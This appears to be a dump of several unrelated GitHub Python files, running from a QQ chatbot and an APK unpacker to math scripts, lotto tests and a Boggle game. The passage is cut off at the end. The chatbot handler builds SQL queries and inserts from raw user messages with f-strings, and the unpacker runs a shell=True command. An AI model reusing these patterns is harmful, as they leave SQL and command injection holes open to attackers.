layout.addWidget(QLabel(\"Number of Rounds: \"), 4, 0)\n layout.addWidget(self.player_a_dropdown, 0, 1)\n layout.addWidget(self.player_b_dropdown, 1, 1)\n layout.addWidget(self.player_a_simul_dropdown, 2, 1)\n layout.addWidget(self.player_b_simul_dropdown, 3, 1)\n layout.addWidget(self.game_count_spin_box, 4, 1)\n layout.addWidget(self.buttonBox, 5, 1)\n\n self.setLayout(layout)\n\n def no_games_changed(self, count):\n self.number_of_games = count\n\n def set_player_a_agent(self, i):\n self.player_a_agent = i + 1\n\n def set_player_b_agent(self, i):\n self.player_b_agent = i + 1\n\n def set_player_a_simul_agent(self, i):\n self.player_a_simul_agent = i + 1\n\n def set_player_b_simul_agent(self, i):\n self.player_b_simul_agent = i + 1\n\n def get_no_games(self):\n return self.number_of_games\n","repo_name":"hfynn5/FinalYearProject","sub_path":"Congkak/DialogueBoxes/MultiGameDialogBox.py","file_name":"MultiGameDialogBox.py","file_ext":"py","file_size_in_byte":3379,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"36908399146","text":"import threading\nimport time\nimport sqlite3\nimport jieba\njieba.set_dictionary(\"dict.txt\")\njieba.initialize()\n\nimport jieba.analyse\nimport logging\nimport global_vars\nimport message_send\n\nadmin_id = global_vars.get_var('admin_id')\nlog_level = global_vars.get_var('log_level')\nbotqq = global_vars.get_var('botqq')\ndatabase_url = global_vars.get_var('database_url')\n\nlogging.basicConfig(level=log_level, format='[Star] %(asctime)s - %(levelname)s - %(message)s')\nlog = logging.getLogger(__name__)\n\n\n\n\ndef dict_factory(cursor, row):\n d = {}\n for idx, col in enumerate(cursor.description):\n d[col[0]] = row[idx]\n return d\n\n\ndb = sqlite3.connect(database_url)\ndb.row_factory = dict_factory\ncur = db.cursor()\n\n\nclass MyThread(threading.Thread):\n def __init__(self, func, args):\n threading.Thread.__init__(self)\n self.func = func\n self.args = args\n self.result = self.func(*self.args)\n\n def get_result(self):\n try:\n return self.result\n except Exception as e:\n log.error(e)\n\n\ndef select(message):\n # execute方式执行查询语句\n db_s = f'select * from q_and_a where quz = \\'{message}\\' or id = \\'{message}\\''\n cur.execute(db_s)\n results = cur.fetchone()\n # print(db_s)\n if results:\n log.info('全字匹配到结果')\n return results\n else:\n log.info('全字匹配为空')\n return False\n\n\ndef like_select(message):\n # execute方式执行查询语句\n cur.execute(f'select * from q_and_a where quz like \\'%{message}%\\'')\n results = cur.fetchone()\n if results:\n log.info('模糊匹配到结果')\n return results\n else:\n log.info('模糊匹配为空')\n return False\n\n\ndef keyword_like_select(message):\n keywords = jieba.analyse.extract_tags(message, topK=5, allowPOS=('n', 'v'))\n if len(keywords) < 2:\n log.info('关键字不足')\n return False\n else:\n dbselect = f'select * from q_and_a where quz like \\'%{keywords.pop()}%\\' '\n for word in keywords:\n dbselect += f'and quz like\\'%{word}%\\' '\n cur.execute(dbselect)\n results = cur.fetchall()\n # print(dbselect)\n if results:\n log.info('关键字匹配到结果')\n return results\n else:\n log.info('关键字匹配为空')\n return False\n\n\ndef learn(quz, ans, ws):\n # execute方式执行语句\n cur.execute(f'insert into q_and_a(quz,ans) values(\\'{quz}\\',\\'{ans}\\')')\n db.commit()\n message_send.send_message(quz+'\\n'+ans, admin_id, None, None, ws, 'private', i=1)\n\n\ndef main_at(message, ws):\n ths = []\n result = []\n # 切除前部at机器人的CQ码\n str = list(message['raw_message'])\n str = ''.join(str)\n length = 12 + len(botqq)\n sliced_message = str.replace(message['raw_message'][0:length + 0:1], '')\n\n select_ways = [select, like_select, keyword_like_select]\n\n for i in select_ways:\n print(sliced_message)\n x = MyThread(i, args=(sliced_message,))\n ths.append(x)\n '''while length < len(ths):\n ths[-1].start()\n print('started ', ths[-1])\n length += 1\n for t in ths:\n t.join()'''\n for t in ths:\n result.append(t.get_result())\n if message['message_type'] == 'group':\n if result[0]:\n log.info('全字匹配回复')\n message_send.send_message(result[0]['ans'], message['group_id'], message['sender']['user_id'],\n message['message_id'], ws, 'group', i=1)\n elif result[1]:\n log.info('模糊匹配回复')\n message_send.send_message(result[1][0]['quz'], message['group_id'], message['sender']['user_id'],\n message['message_id'], ws, 'group', i=2)\n time.sleep(0.5)\n message_send.send_message(result[1][0]['ans'], message['group_id'], message['sender']['user_id'],\n message['message_id'], ws, 'group', i=1)\n elif result[2]:\n log.info('关键字匹配回复')\n quz = []\n i = 0\n while i < len(result[2]):\n quz.append(result[2][i]['quz'])\n i += 1\n message_send.send_message(quz, message['group_id'], message['sender']['user_id'],\n message['message_id'], ws, 'group', i=2)\n else:\n return False\n\n\ndef main(message, ws):\n ths = []\n result = []\n\n select_ways = [select, like_select, keyword_like_select]\n\n for i in select_ways:\n x = MyThread(i, args=(message['raw_message'],))\n ths.append(x)\n '''while length < len(ths):\n ths[-1].start()\n print('started ', ths[-1])\n length += 1\n for t in ths:\n t.join()'''\n for t in ths:\n result.append(t.get_result())\n if message['message_type'] == 'group':\n if result[0]:\n log.info('全字匹配回复')\n message_send.send_message(result[0]['ans'], message['group_id'], message['sender']['user_id'],\n message['message_id'], ws, 'group', 1)\n elif result[1]:\n log.info('模糊匹配回复')\n message_send.send_message(result[1]['ans'], message['group_id'], message['sender']['user_id'],\n message['message_id'], ws, 'group', 1)\n elif result[2]:\n log.info('关键字匹配回复')\n quz = []\n i = 0\n while i < len(result[2]):\n quz.append(result[2][i]['quz'])\n i += 1\n message_send.send_message(quz, message['group_id'], message['sender']['user_id'],\n message['message_id'], ws, 'group', 2)\n else:\n return False\n elif message['message_type'] == 'private':\n if result[0]:\n log.info('全字匹配回复')\n message_send.send_message(result[0]['ans'], message['user_id'], message['sender']['user_id'],\n message['message_id'], ws, 'private', 1)\n elif result[1]:\n log.info('模糊匹配回复')\n message_send.send_message(result[1]['ans'], message['user_id'], message['sender']['user_id'],\n message['message_id'], ws, 'private', 1)\n elif result[2]:\n log.info('关键字匹配回复')\n quz = []\n i = 0\n while i < len(result[2]):\n quz.append(result[2][i]['quz'])\n i += 1\n message_send.send_message(quz, message['user_id'], message['sender']['user_id'],\n message['message_id'], ws, 'private', 2)\n else:\n return False\n\n\ndef setu_(message, ws):\n t = '色狗!kimo!'\n if message['message_type'] == 'group':\n message_send.send_message(t, message['group_id'], message['sender']['user_id'],\n message['message_id'], ws, 'group', 91)\n elif message['message_type'] == 'private':\n message_send.send_message(t, message['user_id'], message['sender']['user_id'],\n message['message_id'], ws, 'private', 91)\n else:\n return False\n","repo_name":"rainsmen/Starbot","sub_path":"message_handle.py","file_name":"message_handle.py","file_ext":"py","file_size_in_byte":7345,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"1810503186","text":"#!/usr/bin/env python\n# -*- coding=utf-8 -*-\nimport subprocess\n\nimport core.controllers.plugin_category as plugin_category\nfrom core.controllers.const import *\nfrom core.controllers.utils import *\nfrom settings import *\n\n\nclass Apktool(plugin_category.Unpacker):\n def __init__(self):\n plugin_category.Unpacker.__init__(self)\n url = \"https://github.com/iBotPeaches/Apktool/releases/download/v2.3.1/apktool_2.3.1.jar\"\n name = \"apktool.jar\"\n self.bin_dir = os.path.join(os.path.split(os.path.realpath(__file__))[0], \"bin\")\n self.success, self.bin_path = download(url, self.bin_dir, name)\n\n def _ability(self):\n return {TYPE.SMALI: ABILITY.B,\n TYPE.ELF: ABILITY.B,\n TYPE.XML: ABILITY.B,\n TYPE.MANIFEST: ABILITY.B,\n }\n\n def start(self):\n if not self.success:\n logging.error(\"Apktool not exist.\")\n return\n command = \"java -jar {apktool_jar} d -f -o {output_path} {apk_path}\".format(\n apktool_jar=self.bin_path,\n apk_path=self.apk_path,\n output_path=self.plugin_task_path, )\n p = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n\n for out_line in iter(p.stdout.readline, b''):\n logging.debug(out_line.replace('\\n', '').replace('\\r', ''))\n for err_line in iter(p.stderr.readline, b''):\n logging.debug(err_line.replace('\\n', '').replace('\\r', ''))\n p.stdout.close()\n p.stderr.close()\n p.wait()\n if p.returncode != 0:\n raise plugin_category.UnpackerException(\"Apktool Failed\")\n\n\nif __name__ == '__main__':\n pass\n","repo_name":"Anemone95/ApkSec","sub_path":"plugins/unpacker/apktool/apktool.py","file_name":"apktool.py","file_ext":"py","file_size_in_byte":1704,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"52"} +{"seq_id":"7829630872","text":"def optimalCoinChange(x, denoms):\n # Function finds the minimum number of coins required to change a monetary\n # amount.\n # Inputs:\n # x = amount of money to be given in coins, given as an INTEGER, in cents.\n # e.g. $1.35 is input as 135\n # denoms = denominations of coins available, in INTEGER cents,\n # given as a ROW VECTOR.\n # Output:\n # numCoins = optimal number of coins used to find x\n # Aiden Burgess - abur970\n\n # Initialise initial coins for change to inf, except 0, which is the base case\n minCoinsNeeded = [float('inf') for i in range(x+1)]\n minCoinsNeeded[0] = 0\n\n # For each change value, iteratively calculate the minimum change required.\n for i in range(x):\n for coin in denoms:\n total = i+coin\n if total <= x:\n minCoinsNeeded[total] = min(\n minCoinsNeeded[total], minCoinsNeeded[i]+1)\n\n return minCoinsNeeded[x]\n","repo_name":"AidenBurgess/Uni-2021","sub_path":"ENGSCI 760/Assignments/3/coinChange.py","file_name":"coinChange.py","file_ext":"py","file_size_in_byte":940,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"44059387458","text":"import numpy as np\nfrom scipy import interpolate\n\nimport matplotlib.pyplot as plt\n\n\nctr =np.array( [(3 , 1), (2.5, 4), (0, 1), (-2.5, 4),\n (-3, 0), (-2.5, -4), (0, -1), (2.5, -4), (3, -1),])\nx=ctr[:,0]\ny=ctr[:,1]\n\n# uncomment both lines for a closed curve\n#x=np.append(x,[x[0]]) \n#y=np.append(y,[y[0]])\n\nl=len(x) \n\nt=np.linspace(0,1,l-2,endpoint=True)\nt=np.append([0,0,0],t)\nt=np.append(t,[1,1,1])\n\ntck=[t,[x,y],3]\nu3=np.linspace(0,1,(max(l*2,70)),endpoint=True)\nout = interpolate.splev(u3,tck)\n\nplt.plot(x,y,'k--',label='Control polygon',marker='o',markerfacecolor='red')\n#plt.plot(x,y,'ro',label='Control points only')\nplt.plot(out[0],out[1],'b',linewidth=2.0,label='B-spline curve')\nplt.legend(loc='best')\nplt.axis([min(x)-1, max(x)+1, min(y)-1, max(y)+1])\nplt.title('Cubic B-spline curve evaluation')\nplt.show()\n\n","repo_name":"kawache/Python-B-spline-examples","sub_path":"b-spline-evaluation.py","file_name":"b-spline-evaluation.py","file_ext":"py","file_size_in_byte":834,"program_lang":"python","lang":"en","doc_type":"code","stars":93,"dataset":"github-code","pt":"52"} +{"seq_id":"6001910549","text":"from django_webtest import WebTest\nfrom hamcrest import assert_that, calling, contains_inanyorder, is_, raises\nfrom webtest.app import AppError\n\nfrom tests.helpers import Fake8Numbers as F8Ns\nfrom tests.helpers import GameFactory8AddNumbers as GF8As\n\n\ndef get_fields_games(numbers, add_numbers, game_id):\n return [\n {'name_game': 'test_lotto2',\n 'game_id': game_id,\n 'numbers': numbers,\n 'add_numbers': add_numbers\n }\n ]\n\n\ndef get_standart_game_obj(game_ids=[1, 2, 3, 4, 5]):\n GF8As(fields_games=get_fields_games(F8Ns.numbers_1, [1], game_ids[0]))\n GF8As(fields_games=get_fields_games(F8Ns.numbers_2, [2], game_ids[1]))\n GF8As(fields_games=get_fields_games(F8Ns.numbers_3, [3], game_ids[2]))\n GF8As(fields_games=get_fields_games(F8Ns.numbers_4, [4], game_ids[3]))\n GF8As(fields_games=get_fields_games(F8Ns.numbers_5, [4], game_ids[4]))\n\n\nclass ComparisonAllNumbersTest(WebTest):\n\n def _get_endpoint(self, game_id):\n return f'/test_lotto2/research_8_add/{game_id}/comparison_all_numbers/'\n\n def test_happy_path_comparison_all_numbers(self):\n get_standart_game_obj()\n\n resp = self.app.get(self._get_endpoint(5))\n assert_that(resp.json.keys(),\n contains_inanyorder('main_game', '1', '3', '2', '4'))\n assert_that(resp.json['main_game'], is_('5'))\n assert_that(resp.json['1'], is_([4, [2, 3, 5, 20]]))\n assert_that(resp.json['2'], is_([3, [4, 12, 13]]))\n assert_that(resp.json['3'], is_([3, [2, 5, 17]]))\n assert_that(resp.json['4'], is_([4, [2, 3, 13, 20]]))\n\n\nclass CombinationOptionsTest(WebTest):\n\n def _get_endpoint(self, game_id):\n return f'/test_lotto2/research_8_add/{game_id}/combination_options/'\n\n def test_happy_path_combination_options(self):\n get_standart_game_obj()\n params = {'how_games': 2}\n\n resp = self.app.get(self._get_endpoint(5), params=params)\n\n assert_that(list(resp.json.keys()),\n is_(['5', '4', '4, 2, 1, 1', '2, 1, 1, 1, 1, 1, 1']))\n assert_that(resp.json['5'], is_([4, 2, 1, 1]))\n assert_that(resp.json['4'], is_([2, 1, 1, 1, 1, 1, 1]))\n assert_that(resp.json['4, 2, 1, 1'], is_(1))\n assert_that(resp.json['2, 1, 1, 1, 1, 1, 1'], is_(1))\n\n\nclass InfoSequenceTest(WebTest):\n\n def _get_endpoint(self, game_id):\n return f'/test_lotto2/research_8_add/{game_id}/info_sequence/'\n\n def _standart_game_obj(self):\n get_standart_game_obj()\n get_standart_game_obj([6, 7, 8, 9, 10])\n get_standart_game_obj([13, 11, 14, 12, 15])\n\n def test_happy_path_info_sequence_without_only_len_sequence(self):\n self._standart_game_obj()\n params = {'how_games': 15,\n 'sequence': '14,15,16',\n 'only_len_sequence': 0}\n\n resp = self.app.get(self._get_endpoint(15), params=params)\n assert_that(resp.json,\n is_([{'11': '11', 'previous game_id': '15', 'difference': 4},\n {'7': '7', 'previous game_id': '11', 'difference': 4},\n {'2': '2', 'previous game_id': '7', 'difference': 5},\n {'min_difference': 4,\n 'middle_difference': 4.333333333333333,\n 'max_difference': 5,\n 'median': 4,\n 'amount_sequence': 3}]))\n\n def test_happy_path_info_sequence_with_only_len_sequence(self):\n self._standart_game_obj()\n params = {'how_games': 15,\n 'sequence': '14,15,16',\n 'only_len_sequence': 1\n }\n resp = self.app.get(self._get_endpoint(15), params=params)\n assert_that(resp.json, is_([{'amount_sequence': 0}]))\n\n params['sequence'] = '9,10,11'\n resp = self.app.get(self._get_endpoint(15), params=params)\n assert_that(resp.json,\n is_([{'13': '13', 'previous game_id': '15', 'difference': 2},\n {'6': '6', 'previous game_id': '13', 'difference': 7},\n {'1': '1', 'previous game_id': '6', 'difference': 5},\n {'min_difference': 2,\n 'middle_difference': 4.666666666666667,\n 'max_difference': 7,\n 'median': 5,\n 'amount_sequence': 3}]))\n\n def test_happy_path_info_sequence_how_info_games(self):\n self._standart_game_obj()\n params = {'how_games': 15,\n 'sequence': '14,15,16',\n 'how_info_games': 10}\n\n resp = self.app.get(self._get_endpoint(15), params=params)\n assert_that(resp.json,\n is_([{'11': '11', 'previous game_id': '15', 'difference': 4},\n {'7': '7', 'previous game_id': '11', 'difference': 4},\n {'min_difference': 4,\n 'middle_difference': 4,\n 'max_difference': 4,\n 'median': 4.0,\n 'amount_sequence': 2}]))\n\n def test_happy_path_validate_sequence(self):\n get_standart_game_obj()\n params = {'how_games': 5,\n 'sequence': '13,15'}\n assert_that(calling(self.app.get).with_args(self._get_endpoint(5), params=params),\n raises(AppError))\n\n\nclass AllSequencesInGamesTest(WebTest):\n def _get_endpoint(self, game_id):\n return f'/test_lotto2/research_8_add/{game_id}/all_sequences_in_games/'\n\n def _standart_game_obj(self):\n get_standart_game_obj()\n get_standart_game_obj([6, 7, 8, 9, 10])\n get_standart_game_obj([13, 11, 14, 12, 15])\n\n def test_happy_path_info_all_sequences_in_games_1(self):\n self._standart_game_obj()\n params = {'how_games': 15,\n 'part_consists_of': 1,\n 'how_info_games': 10}\n\n resp = self.app.get(self._get_endpoint(15), params=params)\n assert_that(resp.json,\n is_({'[1]': 2, '[2]': 8, '[3]': 6, '[4]': 4, '[5]': 6, '[6]': 4,\n '[7]': 2, '[8]': 4, '[9]': 2, '[10]': 6, '[11]': 4, '[12]': 4,\n '[13]': 6, '[14]': 2, '[15]': 4, '[16]': 2, '[17]': 4,\n '[18]': 2, '[19]': 2, '[20]': 6}))\n\n def test_happy_path_info_all_sequences_in_games_3(self):\n self._standart_game_obj()\n params = {'how_games': 15,\n 'part_consists_of': 3,\n 'how_info_games': 10}\n\n resp = self.app.get(self._get_endpoint(15), params=params)\n assert_that(resp.json,\n is_({'[1, 2, 3]': 0, '[2, 3, 4]': 2, '[3, 4, 5]': 2, '[4, 5, 6]': 0,\n '[5, 6, 7]': 2, '[6, 7, 8]': 2, '[7, 8, 9]': 0, '[8, 9, 10]': 0,\n '[9, 10, 11]': 2, '[10, 11, 12]': 0, '[11, 12, 13]': 2,\n '[12, 13, 14]': 2, '[13, 14, 15]': 2, '[14, 15, 16]': 2,\n '[15, 16, 17]': 0, '[16, 17, 18]': 0, '[17, 18, 19]': 0,\n '[18, 19, 20]': 0}))\n\n\nclass ProbabilitySequencesTest(WebTest):\n def _get_endpoint(self, game_id):\n return f'/test_lotto2/research_8_add/{game_id}/probability_sequences/'\n\n def _standart_game_obj(self):\n get_standart_game_obj()\n get_standart_game_obj([6, 7, 8, 9, 10])\n get_standart_game_obj([13, 11, 14, 12, 15])\n\n def test_happy_path_info_all_sequences_in_games_1(self):\n self._standart_game_obj()\n params = {'how_games': 10,\n 'part_consists_of': 3,\n 'steps_back_games': 5,\n 'limit_overlap': 2,\n 'limit_amount_seq': 2,\n }\n\n resp = self.app.get(self._get_endpoint(15), params=params)\n assert_that(resp.json,\n is_({'12': {'ids': ['11', '10', '9', '8', '7'],\n 'exceeding_limit_overlap': {'[11, 12, 13]': 2,\n '[12, 13, 14]': 2,\n '[13, 14, 15]': 2,\n '[14, 15, 16]': 2},\n 'numbers_have': []},\n 'check_games': 10,\n 'exceeding_limit_overlap': 1,\n 'numbers_have': 0}))\n","repo_name":"FillGit/lotto","sub_path":"tests/test_app/view/research/test_research_8_add.py","file_name":"test_research_8_add.py","file_ext":"py","file_size_in_byte":8470,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"1264406194","text":"### Programme which makes a plot of runtime\n# with and without paralellization\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport math\n\n# input files\ninfile1 = open(\"./Results/cycles/timeO2.txt\")\ninfile2 = open(\"./Results/cycles/timeO3.txt\")\ninfile3 = open(\"./Results/cycles/timeOfast.txt\")\ninfile4 = open(\"./Results/cycles/timeunp.txt\")\n\n# loadtext to get matrices\ninput1 = np.loadtxt(infile1.readlines())\ninput2 = np.loadtxt(infile2.readlines())\ninput3 = np.loadtxt(infile3.readlines())\ninput4 = np.loadtxt(infile4.readlines())\n\n# transform to log scale with base 10\na1 = np.log10(input1[:,1])\na2 = np.log10(input1[:,0])\n\nb1 = np.log10(input2[:,1])\nb2 = np.log10(input2[:,0])\n\nc1 = np.log10(input3[:,1])\nc2 = np.log10(input3[:,0])\n\nd1 = np.log10(input4[:,1])\nd2 = np.log10(input4[:,0])\n\n# plot\nplt.plot(a1, a2, 'rx', label = \"-O2\")\nplt.plot(b1, b2, 'bx', label = \"-O3\")\nplt.plot(c1, c2, 'cx', label = \"-Ofast\")\nplt.plot(d1, d2, 'gx', label = \"Unparallellized w/out flags\")\n\nplt.xlabel('MC cycles $\\log_{10}$(N)')\nplt.ylabel('Time $\\log_{10}$(t)')\nplt.legend()\nplt.show()\n","repo_name":"Seedsiz/FYS4150-Project4","sub_path":"code-and-results/plottime.py","file_name":"plottime.py","file_ext":"py","file_size_in_byte":1081,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"70982607845","text":"import servicemanager\nimport socket\nimport sys\nimport win32event\nimport win32service\nimport win32serviceutil\n\nimport threading\nimport logging\nimport os\nimport signal\n\nlogger = logging.getLogger('service')\ndebug = logger.debug\n\nimport subprocess\n\nclass TestService(win32serviceutil.ServiceFramework):\n _svc_name_ = \"TestService\"\n _svc_display_name_ = \"Test Service\"\n\n def __init__(self, args):\n win32serviceutil.ServiceFramework.__init__(self, args)\n self.hWaitStop = win32event.CreateEvent(None, 0, 0, None)\n socket.setdefaulttimeout(60)\n import server\n self.startstop = server.premain(daemon=True)\n\n def SvcStop(self):\n self.ReportServiceStatus(win32service.SERVICE_STOP_PENDING)\n win32event.SetEvent(self.hWaitStop)\n\n def SvcDoRun(self):\n start,stop,wait,kill = self.startstop\n start()\n rc = None\n while rc != win32event.WAIT_OBJECT_0:\n rc = win32event.WaitForSingleObject(self.hWaitStop, 5000)\n stop()\n wait()\n\n\nif __name__ == '__main__':\n if len(sys.argv) == 1:\n servicemanager.Initialize()\n servicemanager.PrepareToHostSingle(TestService)\n servicemanager.StartServiceCtrlDispatcher()\n else:\n win32serviceutil.HandleCommandLine(TestService)\n","repo_name":"alex-eri/spot4","sub_path":"server/WindowsService.py","file_name":"WindowsService.py","file_ext":"py","file_size_in_byte":1296,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"8892810422","text":"#!/usr/bin/python\nimport time\n\n\ndef create_list_with_append():\n fin = open('words.txt')\n list_of_words = []\n\n for line in fin:\n word = line.strip()\n list_of_words.append(word)\n\n return list_of_words\n\ndef create_list_with_idiom():\n fin = open('words.txt')\n line = fin.readline()\n t = []\n\n for line in fin:\n word = line.strip()\n t += [word]\n\n return t\n\nstart = time.time()\ncreate_list_with_append()\nend = time.time()\nprint(\"The time of execution of above program is :\", end - start)\n\n\nstart = time.time()\ncreate_list_with_idiom()\nend = time.time()\nprint(\"The time of execution of above program is :\", end - start)","repo_name":"norbiax/Think-Python-excercises","sub_path":"wordlist.py","file_name":"wordlist.py","file_ext":"py","file_size_in_byte":666,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"36490335488","text":"import pygame, sys, time\nfrom pygame.locals import *\nfrom client import Client\nimport gamestate\nfrom customlib import *\n\npygame.init()\n\nclient = Client(input(\"Server IPv4 Address: \"))\n\n# -- OPTIONS --\n\n# Legend:\n# - Window: the whole screen\n# - Round rects: the three decorative round rect borders\n# - Squares: the small squares containing the nine letters\n# - Panel: the large square containing the nine small squares\n# - Message: the thin display below the panel\n# - Enterbox: the dark display below the message\n# - Hourglass: the timer in the center\n# - Scorecards: the rectangles containing player scores\n# - Title: the label above the scorecards\n\n# Dimensions\n\nwindowSize = (1300, 800)\nwindowBevel = 10\n\ndisplaySurface = pygame.display.set_mode(windowSize)\n\nroundRectRects = [(50, 50, 500, 700), (580, 50, 140, 700), (750, 50, 500, 700)]\nroundRectRadius = 8\n\nsquareTLRect = (105, 105, 110, 110)\nsquareSpacing = 140\nsquareTextHeight = 6\nsquareShadowHeight = 10\nsquareRects = [(squareTLRect[0] + squareSpacing * (i%3), squareTLRect[1] + squareSpacing * int(i/3)) + squareTLRect[2:4] for i in range(9)]\n\npanelRect = (75, 75, 450, 450)\n\nmessageRect = (75, 550, 450, 50)\n\nenterboxRect = (75, 625, 450, 100)\nenterboxBorder = 5\n\nhourglassRect = (605, 75, 90, 650)\nhourglassBorder1 = 5\nhourglassBorder2 = 5\n\nscorecardTRect = (775, 200, 450, 75)\nscorecardSpacing = 85\nscorecardBorder = 5\nscorecardTextMarginLeft = 15\nscorecardTextMarginRight = 15\n\ntitleRect = (775, 75, 450, 100)\ntitleTextHeight = 6\n\n# Colors\n\nwindowColor = \"#8766cc\"\nwindowColorLight = \"#a58cd9\"\nwindowColorDark = \"#693fc0\"\n\nroundRectColor = (110, 77, 178)\n\nsquareOffColor = \"#a3b3c2\"\nsquareOnColor = \"#4747eb\"\nsquareShadowOffColor = \"#6c8193\"\nsquareShadowOnColor = \"#3333cc\"\nsquareTextOffColor = \"#141f1f\"\nsquareTextOnColor = \"#deeded\"\nsquareTextShadowOffColor = \"#677e7e\"\nsquareTextShadowOnColor = \"#8fa3a3\"\n\npanelColor = \"#342673\"\n\nmessageColor = \"#563894\"\nmessageTextStartColor = \"#33eeff\"\nmessageTextUniqueColor = \"#33ff44\"\nmessageTextTakenColor = \"#ffcc33\"\nmessageTextInvalidColor = \"#ff4433\"\n\nenterboxColor = \"#23194d\"\nenterboxBorderColor = \"#342673\"\nenterboxTextColor = \"#e9fbfb\"\n\nhourglassBorder1Color = \"#563894\"\nhourglassBorder2Color = \"#342673\"\n\nscorecardColor = \"#23194d\"\nscorecardBorderNormalColor = \"#342673\"\nscorecardBorderTopColor = \"#cde052\"\nscorecardTextNameNormalColor = \"#7466cc\"\nscorecardTextNameSelfColor = \"#3df599\"\nscorecardTextScoreColor = \"#e8e87d\"\n\ntitleColor = \"#4c3181\"\ntitleTextUpperColor = \"#f4f4f1\"\ntitleTextLowerColor = \"#bcbca9\"\n\n# Fonts\n\nsquareFont = loadFont(\"RosaSans-Black.ttf\", 100)\nmessageFont = loadFont(\"RosaSans-SemiBold.ttf\", 33)\nenterboxFont = loadFont(\"RosaSans-Bold.ttf\", 66)\nscorecardNameFont = loadFont(\"RosaSans-SemiBold.ttf\", 50)\nscorecardScoreFont = loadFont(\"RosaSans-Bold.ttf\", 58)\ntitleFont = loadFont(\"RosaSans-SemiBold.ttf\", 66)\n\nhourglassImage = loadImage(\"hourglass.png\")\n\n# Surfaces\n\nbackgroundSurface = pygame.Surface(windowSize, SRCALPHA).convert_alpha()\npygame.draw.polygon(backgroundSurface, windowColorLight, ((0, 0), (windowSize[0], 0), (windowSize[0] - windowBevel, windowBevel), (windowBevel, windowBevel), (windowBevel, windowSize[1] - windowBevel), (0, windowSize[1])))\npygame.draw.polygon(backgroundSurface, windowColorDark, ((windowSize[0], windowSize[1]), (0, windowSize[1]), (windowBevel, windowSize[1] - windowBevel), (windowSize[0] - windowBevel, windowSize[1] - windowBevel), (windowSize[0] - windowBevel, windowBevel), (windowSize[0], 0)))\npygame.draw.rect(backgroundSurface, windowColor, (windowBevel, windowBevel, windowSize[0] - windowBevel * 2, windowSize[1] - windowBevel * 2))\nfor rect in roundRectRects:\n drawRoundRectTopLeft(backgroundSurface, rect[0:2], rect[2:4], roundRectRadius, roundRectColor)\npygame.draw.rect(backgroundSurface, panelColor, panelRect)\npygame.draw.rect(backgroundSurface, messageColor, messageRect)\npygame.draw.rect(backgroundSurface, enterboxBorderColor, enterboxRect)\ndrawShrunkenRect(backgroundSurface, enterboxColor, enterboxRect, enterboxBorder)\npygame.draw.rect(backgroundSurface, hourglassBorder1Color, hourglassRect)\ndrawShrunkenRect(backgroundSurface, hourglassBorder2Color, hourglassRect, hourglassBorder1)\npygame.draw.rect(backgroundSurface, titleColor, titleRect)\nblitRectCenter(backgroundSurface, titleFont.render(\"Boggle!\", True, titleTextLowerColor), titleRect, (0, titleTextHeight / 2))\nblitRectCenter(backgroundSurface, titleFont.render(\"Boggle!\", True, titleTextUpperColor), titleRect, (0, titleTextHeight / -2))\n\n# Input\n\nadjacentIndices = {0:(1,3,4), 1:(0,2,3,4,5), 2:(1,4,5), 3:(0,1,4,6,7), 4:(0,1,2,3,5,6,7,8), 5:(1,2,4,7,8), 6:(3,4,7), 7:(3,4,5,6,8), 8:(4,5,7)}\n\nclass App:\n def __init__(self):\n self.client = client\n self.client.app = self\n\n self.clock = pygame.time.Clock()\n self.refreshRate = 60\n self.previousClockTime = time.perf_counter()\n\n self.displaySurface = displaySurface\n pygame.display.set_caption(\"Boggle!\")\n\n self.squareSurfaces = [pygame.Surface(squareTLRect[2:4], SRCALPHA).convert_alpha() for i in range(9)]\n self.messageSurface = pygame.Surface(messageRect[2:4], SRCALPHA).convert_alpha()\n self.enterboxSurface = pygame.Surface(enterboxRect[2:4], SRCALPHA).convert_alpha()\n self.hourglassSurface = pygame.Surface(hourglassImage.get_size(), SRCALPHA).convert_alpha()\n self.scorecardSurfaces = []\n\n self.updateMessageSurface(\"start\", ready = False)\n\n self.inputIndices = []\n self.inputWord = \"\"\n\n self.loop()\n\n def loop(self):\n while True:\n keys = pygame.key.get_pressed()\n\n for event in pygame.event.get():\n if event.type == QUIT:\n pygame.quit()\n sys.exit()\n elif event.type == KEYDOWN:\n if self.client.state.phase == \"idle\":\n if event.key == K_SPACE: # Space\n self.updateMessageSurface(\"start\", ready = True)\n self.client.sendReady()\n elif self.client.state.phase == \"play\":\n if event.unicode.isalpha(): # Letter\n self.addLetter(event.unicode.upper())\n elif event.key == K_BACKSPACE: # Backspace\n self.removeLetter()\n elif event.key == K_RETURN: # Return\n self.submitWord()\n\n self.displaySurface.blit(backgroundSurface, (0, 0))\n\n self.updateSquareSurfaces()\n for i in range(9): self.displaySurface.blit(self.squareSurfaces[i], squareRects[i][0:2])\n\n self.displaySurface.blit(self.messageSurface, messageRect)\n self.displaySurface.blit(self.enterboxSurface, enterboxRect)\n\n self.updateHourglassSurface()\n if self.client.state.phase == \"play\":\n self.displaySurface.blit(self.hourglassSurface, addVector(hourglassRect[0:2], unitVector(2, hourglassBorder1 + hourglassBorder2)))\n\n self.updateScorecardSurfaces()\n for i in range(len(self.scorecardSurfaces)): self.displaySurface.blit(self.scorecardSurfaces[i], addVector(scorecardTRect[0:2], (0, i * scorecardSpacing)))\n\n pygame.display.update()\n self.clock.tick(self.refreshRate)\n \n def addLetter(self, key):\n # if self.inputIndices == [] or (index in adjacentIndices[self.inputIndices[-1]] and index not in self.inputIndices):\n # self.inputIndices.append(index)\n # self.inputWord += self.client.state.letters[int(index/3)][index%3]\n # self.updateEnterboxSurface()\n if len(self.inputWord) < 9: self.inputWord += key\n self.updateEnterboxSurface()\n\n def removeLetter(self):\n # if self.inputIndices != []:\n # self.inputIndices = 